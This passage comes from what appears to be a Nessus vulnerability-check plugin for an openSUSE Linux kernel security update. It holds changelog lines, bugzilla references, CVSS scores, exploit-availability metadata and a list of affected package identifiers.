boo#901754).\n\n - enic: set netdev->vlan_features (bsc#966245).\n\n - ext4: fix races between buffered IO and collapse /\n insert range (bsc#972174).\n\n - ext4: fix races between page faults and hole punching\n (bsc#972174).\n\n - ext4: fix races of writeback with punch hole and zero\n range (bsc#972174).\n\n - ext4: move unlocked dio protection from\n ext4_alloc_file_blocks() (bsc#972174).\n\n - ipv4/fib: do not warn when primary address is missing if\n in_dev is dead (bsc#971360).\n\n - ipvs: count pre-established TCP states as active\n (bsc#970114).\n\n - net: core: Correct an over-stringent device loop\n detection (bsc#945219).\n\n - netback: do not use last request to determine minimum Tx\n credit (bsc#957988).\n\n - pciback: Check PF instead of VF for PCI_COMMAND_MEMORY.\n\n - pciback: Save the number of MSI-X entries to be copied\n later.\n\n - pciback: guarantee one time reads of shared ring\n contents (bsc#957988).\n\n - series.conf: move cxgb3 patch to network drivers section\n\n - usb: quirk to stop runtime PM for Intel 7260\n (bnc#984464).\n\n - x86: standardize mmap_rnd() usage (bnc#974308).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=901754\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=941113\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=942702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=945219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=955654\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=957052\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=957988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=959709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=960561\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=961512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963765\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966437\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=967972\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=967973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=967974\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=967975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968011\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968012\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968018\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969354\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969355\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970114\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970909\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970911\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970955\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970958\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971628\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971799\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971919\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=972174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973378\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=974308\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=974418\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=974646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=975945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978469\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979548\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979879\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979913\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=980348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=980363\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=980371\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=980725\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=981267\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=982706\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=983143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=983213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=984464\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=984755\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=984764\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=986362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=986365\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=986377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=986572\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=986573\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=986811\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected the Linux Kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bbswitch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bbswitch-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bbswitch-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bbswitch-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bbswitch-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bbswitch-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bbswitch-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bbswitch-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bbswitch-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bbswitch-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-eppic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-eppic-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-gcore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-gcore-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-qa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-qa-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libipset3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libipset3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-desktop-icons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo\");\n 